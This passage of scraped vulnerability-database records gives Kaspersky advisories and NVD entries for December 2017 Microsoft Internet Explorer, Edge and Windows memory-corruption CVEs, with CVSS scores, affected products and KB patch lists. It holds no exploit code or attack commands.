\n[CVE-2017-11889](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11889>) \n[CVE-2017-11890](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11890>) \n[CVE-2017-11893](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11893>) \n[CVE-2017-11894](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11894>) \n[CVE-2017-11895](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11895>) \n[CVE-2017-11901](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11901>) \n[CVE-2017-11903](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11903>) \n[CVE-2017-11905](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11905>) \n[CVE-2017-11906](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11906>) \n[CVE-2017-11907](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11907>) \n[CVE-2017-11908](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11908>) \n[CVE-2017-11909](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11909>) \n[CVE-2017-11910](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11910>) \n[CVE-2017-11911](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11911>) \n[CVE-2017-11912](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11912>) \n[CVE-2017-11913](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11913>) \n[CVE-2017-11914](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11914>) \n[CVE-2017-11918](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11918>) \n[CVE-2017-11919](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11919>) \n[CVE-2017-11930](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11930>) \n[CVE-2017-11916](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11916>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-11886](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11886>)7.6Critical \n[CVE-2017-11887](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11887>)2.6Warning \n[CVE-2017-11888](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11888>)7.6Critical \n[CVE-2017-11889](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11889>)7.6Critical \n[CVE-2017-11890](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11890>)7.6Critical \n[CVE-2017-11893](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11893>)7.6Critical \n[CVE-2017-11894](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11894>)7.6Critical \n[CVE-2017-11895](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11895>)7.6Critical \n[CVE-2017-11901](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11901>)7.6Critical \n[CVE-2017-11903](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11903>)7.6Critical \n[CVE-2017-11905](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11905>)7.6Critical \n[CVE-2017-11906](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11906>)2.6Warning \n[CVE-2017-11907](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11907>)7.6Critical \n[CVE-2017-11908](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11908>)7.6Critical \n[CVE-2017-11909](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11909>)7.6Critical \n[CVE-2017-11910](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11910>)7.6Critical \n[CVE-2017-11911](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11911>)7.6Critical \n[CVE-2017-11912](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11912>)7.6Critical \n[CVE-2017-11913](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11913>)7.6Critical \n[CVE-2017-11914](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11914>)7.6Critical \n[CVE-2017-11918](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11918>)7.6Critical \n[CVE-2017-11919](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11919>)2.6Warning \n[CVE-2017-11930](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11930>)7.6Critical \n[CVE-2017-11916](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11916>)7.6Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4053578](<http://support.microsoft.com/kb/4053578>) \n[4053579](<http://support.microsoft.com/kb/4053579>) \n[4053580](<http://support.microsoft.com/kb/4053580>) \n[4053581](<http://support.microsoft.com/kb/4053581>) \n[4054517](<http://support.microsoft.com/kb/4054517>) \n[4054518](<http://support.microsoft.com/kb/4054518>) \n[4054519](<http://support.microsoft.com/kb/4054519>) \n[4054520](<http://support.microsoft.com/kb/4054520>) \n[4052978](<http://support.microsoft.com/kb/4052978>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "kaspersky", "title": "KLA11158 Multiple vunlerabilities in Microsoft Browsers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11888", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11919", "CVE-2017-11930"], "modified": "2020-07-22T00:00:00", "id": "KLA11158", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11158/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-18T11:19:31", "description": "### *Detect date*:\n12/12/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extedned Support Update). Malicious users can exploit these vulnerabilities to execute arbitrary code, obtain sensitive information.\n\n### *Affected products*:\nChakraCore \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nInternet Explorer 9 \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows 8.1 for x64-based systems \nWindows Server 2012 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nInternet Explorer 11 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2016 \nWindows 10 Version 1709 for x64-based Systems \nWindows RT 8.1 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 10 Version 1703 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nMicrosoft Edge (EdgeHTML-based) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server, version 1709 (Server Core Installation) \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1703 for 32-bit Systems \nInternet Explorer 10 \nWindows Server 2012 R2\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-11885](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11885>) \n[CVE-2017-11886](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11886>) \n[CVE-2017-11887](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11887>) \n[CVE-2017-11894](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11894>) \n[CVE-2017-11927](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11927>) \n[CVE-2017-11907](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11907>) \n[CVE-2017-11890](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11890>) \n[CVE-2017-11912](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11912>) \n[CVE-2017-11906](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11906>) \n[CVE-2017-11903](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11903>) \n[CVE-2017-11913](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11913>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-11885](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11885>)8.5Critical \n[CVE-2017-11927](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11927>)4.3Warning \n[CVE-2017-11886](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11886>)7.6Critical \n[CVE-2017-11887](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11887>)2.6Warning \n[CVE-2017-11890](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11890>)7.6Critical \n[CVE-2017-11894](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11894>)7.6Critical \n[CVE-2017-11903](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11903>)7.6Critical \n[CVE-2017-11906](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11906>)2.6Warning \n[CVE-2017-11907](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11907>)7.6Critical \n[CVE-2017-11912](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11912>)7.6Critical \n[CVE-2017-11913](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11913>)7.6Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4052303](<http://support.microsoft.com/kb/4052303>) \n[4054518](<http://support.microsoft.com/kb/4054518>) \n[4054521](<http://support.microsoft.com/kb/4054521>) \n[4052978](<http://support.microsoft.com/kb/4052978>) \n[4103712](<http://support.microsoft.com/kb/4103712>) \n[4103718](<http://support.microsoft.com/kb/4103718>) \n[4130957](<http://support.microsoft.com/kb/4130957>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "kaspersky", "title": "KLA10918 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885", "CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11890", "CVE-2017-11894", "CVE-2017-11903", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11927"], "modified": "2020-07-22T00:00:00", "id": "KLA10918", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10918/", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-08-18T11:15:37", "description": "### *Detect date*:\n12/12/2017\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Windows. Malicious user can exploit these vulnerabilities to obtain sensitive information, bypass security restrictions and execute arbitrary code.\n\n### *Affected products*:\nWindows 10 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 1511 for 32-bit Systems \nWindows 10 Version 1511 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1703 for 32-bit Systems \nWindows 10 Version 1703 for x64-based Systems \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1709 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows 8.1 for x64-based systems \nWindows RT 8.1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 \nWindows Server 2012 (Server Core installation) \nWindows Server 2012 R2 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2016 \nWindows Server 2016 (Server Core installation) \nWindows Server, version 1709 (Server Core Installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-11885](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11885>) \n[CVE-2017-11899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11899>) \n[CVE-2017-11927](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11927>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2017-11885](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11885>)8.5Critical \n[CVE-2017-11899](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11899>)7.5Critical \n[CVE-2017-11927](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11927>)4.3Warning\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4053578](<http://support.microsoft.com/kb/4053578>) \n[4053579](<http://support.microsoft.com/kb/4053579>) \n[4053580](<http://support.microsoft.com/kb/4053580>) \n[4053581](<http://support.microsoft.com/kb/4053581>) \n[4054517](<http://support.microsoft.com/kb/4054517>) \n[4054519](<http://support.microsoft.com/kb/4054519>) \n[4054520](<http://support.microsoft.com/kb/4054520>) \n[4054522](<http://support.microsoft.com/kb/4054522>) \n[4054523](<http://support.microsoft.com/kb/4054523>) \n[4103723](<http://support.microsoft.com/kb/4103723>) \n[4103716](<http://support.microsoft.com/kb/4103716>) \n[4103731](<http://support.microsoft.com/kb/4103731>) \n[4103715](<http://support.microsoft.com/kb/4103715>) \n[4103730](<http://support.microsoft.com/kb/4103730>) \n[4103726](<http://support.microsoft.com/kb/4103726>) \n[4103727](<http://support.microsoft.com/kb/4103727>) \n[4103725](<http://support.microsoft.com/kb/4103725>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "kaspersky", "title": "KLA11156 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885", "CVE-2017-11899", "CVE-2017-11927"], "modified": "2020-07-22T00:00:00", "id": "KLA11156", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11156/", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T12:42:13", "description": "Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user, due to how Internet Explorer handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11886", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-26T14:52:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:10"], "id": "CVE-2017-11886", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11886", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:17", "description": "ChakraCore and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11889", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-26T14:55:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11889", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11889", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:22", "description": "Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user, due to how Internet Explorer handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11890", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-26T14:56:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:10"], "id": "CVE-2017-11890", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11890", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:57", "description": "ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and and Internet Explorer adn Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11894", 